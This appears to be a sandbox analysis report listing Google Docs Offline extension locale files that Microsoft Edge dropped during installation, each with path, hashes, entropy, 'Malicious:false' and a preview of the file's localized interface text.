                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):968
                                                                                                                                                                                                                                                                          Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                          MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                          SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                          SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                          SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):838
                                                                                                                                                                                                                                                                          Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                          MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                          SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                          SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                          SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1305
                                                                                                                                                                                                                                                                          Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                          MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                          SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                          SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                          SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):911
                                                                                                                                                                                                                                                                          Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                          MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                          SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                          SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                          SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):939
                                                                                                                                                                                                                                                                          Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                          MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                          SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                          SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                          SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                          Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                          MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                          SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                          SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                          SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):972
                                                                                                                                                                                                                                                                          Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                          MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                          SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                          SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                          SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):990
                                                                                                                                                                                                                                                                          Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                          MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                          SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                          SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                          SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1658
                                                                                                                                                                                                                                                                          Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                          MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                          SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                          SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                          SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1672
                                                                                                                                                                                                                                                                          Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                          MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                          SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                          SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                          SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):935
                                                                                                                                                                                                                                                                          Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                          MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                          SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                          SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                          SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1065
                                                                                                                                                                                                                                                                          Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                          MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                          SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                          SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                          SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2771
                                                                                                                                                                                                                                                                          Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                          MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                          SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                          SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                          SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):858
                                                                                                                                                                                                                                                                          Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                          Encrypted:false
